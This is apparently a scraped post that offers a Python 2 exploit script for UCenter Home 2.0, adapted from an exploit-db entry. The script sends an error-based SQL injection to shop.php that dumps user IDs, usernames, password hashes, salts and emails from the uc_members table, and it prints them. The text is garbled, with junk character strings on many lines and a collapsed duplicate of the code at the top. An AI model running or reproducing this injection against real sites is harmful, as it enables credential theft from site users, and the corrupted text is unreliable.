UCenter Home 2.0 EXP

admin

#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl


#!/usr/bin/env python  

5 v8 J) q. o/ [import sys  
import urllib2  
import re  

def info():  
    print 'From:http://www.exploit-db.com/exploits/14997/'
( a/ f7 g# [/ D3 D1 Z    print 'http://www.hake.cc/Web_loudong/'
    print 'changed:qiaoy'  
    print 'exp:'  
" \3 \" r; V+ I% L: ~    print ' ./UCenter_Home_2.0.py site'  
1 e& u) H7 z/ G: a
def main():  
    if len(sys.argv) != 2:  
        info()  
    else:  
5 H$ v8 s, c$ m2 h# ~4 G- Y& ~        site = sys.argv[1]  
2 u6 i/ ^% V) {2 a, g        if site[0:7] == 'http://':  
3 c" T6 ^; ?' {( E            sitesite =site  
        elif site[0:8] == 'https://':  
( H5 L0 k8 \& X" h5 x2 k7 X3 t+ D            sitesite = site  
% s0 u  H/ B0 h( |        else:  
5 i( ?* Y- J; c5 B% ?            site = 'http://'+site  
        try:  
: O; W/ B, u0 B# X            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  
            Value = urllib2.urlopen(url).read()  
1 C5 Y% n( N% F( _            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  
; H- }. D4 h1 @& |            hacked = Msg.split(':')  
- Q* p1 ^9 i6 H            print 'Name:    '+hacked[1]  
            print 'Passwd:  '+hacked[2]  
            print 'salt:    '+hacked[3]  
            print 'email:   '+hacked[4]  
+ g0 M  n+ y0 [7 y- T        except:  
            print 'Sorry,I can\'t work............'  

( H" b! G: e4 Lif __name__ == '__main__':  
) X  Q" ~6 z+ v& T. N& {    main()